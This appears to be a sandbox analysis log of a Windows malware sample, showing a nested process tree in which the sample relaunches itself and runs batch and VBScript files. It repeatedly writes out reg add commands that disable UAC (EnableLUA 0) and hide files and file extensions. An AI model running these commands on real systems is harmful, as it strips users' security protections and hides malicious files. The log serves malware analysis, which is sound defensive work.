        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        12⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\AukAMEkg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        12⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        Modifies registry key
        
        PID:700
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        11⤵
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        12⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\CAsskUIo.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        13⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\NuokoocA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        10⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        UAC bypass
        
        PID:1968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\xAQccIcA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        8⤵
        
        PID:1236
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        
        PID:2928
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:2292
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:296
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:2120
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies registry key
      PID:1476
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:1236
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:532
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\ouQEwcQc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:2792
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:748
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2200
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\NEsYYocA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1073569754-7958086901888769682-1862235622-4212942841285595155-1580213117853794214"
1⤵
- UAC bypass
PID:904

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2692

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:936

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2364

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2168

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:700
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:1576
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1624
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\zQgQgcQc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\xUUcUYgc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1312
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2800

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1928
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2944
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SEwAAwws.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
    3⤵
    PID:540
  - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
      C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
      4⤵
      PID:292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2620

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:1124
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    PID:1104
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:1784
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:2460
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:548
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\kysIIUQw.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:3064
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1608
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:2268
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2404
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:2040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\xcUEAAAM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:692
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2524
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:328
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\NiUEkooQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:2636
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\IAEskAgY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:112
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:2520
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:2364
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies registry key
      PID:2528
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:936
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:992
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
    3⤵
    PID:1440

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2772
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:920
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:1088
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  - Modifies registry key
  PID:2848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\wuUUMgAM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    - Checks whether UAC is enabled
    - System policy modification
    PID:296

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:1748
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    PID:2876
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:636
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:748
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:2368
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:884
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1284
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZOUEsgAM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:2628
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:2656
  - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
      C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2736
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        5⤵
        
        PID:3036
      - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        7⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2456
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        9⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:112
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        11⤵
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        12⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        13⤵
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        14⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        15⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        16⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        17⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        18⤵
        
        PID:1252
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        19⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        20⤵
        
        PID:992
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        21⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        22⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        23⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        24⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        25⤵
        
        PID:108
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        26⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        27⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\TsEgYckA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        27⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        28⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        27⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        
        PID:540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        27⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        28⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        29⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        29⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        29⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\TMQskIYA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        29⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        30⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        29⤵
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        26⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        
        PID:1424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        
        PID:992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        
        PID:540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        28⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        25⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        25⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        25⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1520
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\JGcEwssk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        25⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        25⤵
        
        PID:1844
